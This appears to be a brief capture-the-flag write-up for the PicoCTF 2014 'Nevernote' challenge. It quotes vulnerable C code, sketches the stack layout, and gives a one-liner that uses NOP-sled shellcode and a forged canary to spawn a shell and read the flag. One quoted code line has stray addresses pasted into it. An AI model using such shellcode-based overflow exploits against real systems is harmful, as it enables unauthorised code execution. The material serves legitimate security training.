# PicoCTF 2k14 - Nevernote


# cd /home/nevernote
# cat nevernote.c
...
bool get_note(char *dest){
    struct safe_buffer temporary;
    bool valid;

    get_canary(&temporary.can);

    printf("Write your note: ");
    fflush(stdout);
    fgets(temporary.buf, NOTE_SIZE, stdin);

    // disallow some characters
    if (strchr(temporary.buf, '\t') || strchr(temporary.buf, '\r')){
        valid = false;
    }else{
        valid = true;
        strncpy(dest, temporary.buf, NOTE_SIZE); 0x0804c050, 0xffffd334
    }

    verify_canary(&temporary.can);

    return valid;
}
...

# cat canary.h
#define SAFE_BUFFER_SIZE 512

struct canary{
    int canary;
    int *verify;
};

/* buffer overflow resistant buffer */
struct safe_buffer{
    char buf[SAFE_BUFFER_SIZE];
    struct canary can;
};
...

buffer(512) + canary + verify + padding + ret + dest
canary = buffer[0:4]
verify = dest
ret = temporarybuf

# (python -c 'import struct; nop = "\x90"; sc = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; buffer = nop*4 + sc + nop*(512 - 4 - len(sc)); canary = buffer[0:4]; dest = struct.pack("<I", 0x0804c050); verify = dest; padding = nop*16; temporarybuf = struct.pack("<I", 0xffffd334); ret = temporarybuf; print "user\na\n" + buffer + canary + verify + padding + ret + dest'; cat) | ./nevernote
Please enter your name: Enter a command: Write your note:
cat flag.txt
the_hairy_canary_fairy_is_still_very_wary

No comments: